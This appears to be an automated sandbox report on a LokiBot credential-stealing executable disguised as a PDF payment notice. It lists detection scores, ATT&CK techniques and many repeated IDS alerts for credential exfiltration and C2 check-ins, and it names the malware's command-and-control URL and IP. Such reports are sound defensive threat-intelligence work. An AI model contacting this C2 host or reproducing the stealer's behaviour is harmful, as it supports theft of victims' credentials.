Loading ...

Play interactive tourEdit tour

Analysis Report Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:195637
Start date:12.12.2019
Start time:09:38:43
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 51s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.winEXE@3/2@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 99.5% (good quality ratio 97.1%)
  • Quality average: 83.7%
  • Quality standard deviation: 24.8%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 67
  • Number of non-executed functions: 154
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through API1Application Shimming1Access Token Manipulation1Software Packing2Credential Dumping2System Time Discovery1Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaCommand-Line Interface2Port MonitorsProcess Injection12Deobfuscate/Decode Files or Information1Input Capture21Account Discovery1Remote ServicesData from Local System2Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesApplication Shimming1Obfuscated Files or Information2Credentials in Registry2Security Software Discovery241Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingMasquerading1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput Capture21Data EncryptedStandard Application Layer Protocol12SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessVirtualization/Sandbox Evasion13Account ManipulationSystem Information Discovery27Shared WebrootClipboard Data1Scheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceAccess Token Manipulation1Brute ForceVirtualization/Sandbox Evasion13Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection12Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistoryApplication Window Discovery11Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://107.175.150.73/~giftioz/.vokol/fre.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://107.175.150.73/~giftioz/.vokol/fre.phpVirustotal: Detection: 16%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeVirustotal: Detection: 39%Perma Link

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00408788 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00408788
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00476F2C FindFirstFileA,GetLastError,FindClose,0_2_00476F2C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004052B8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_004052B8
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_1_00403D74

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49721 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49721 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 107.175.150.73:80
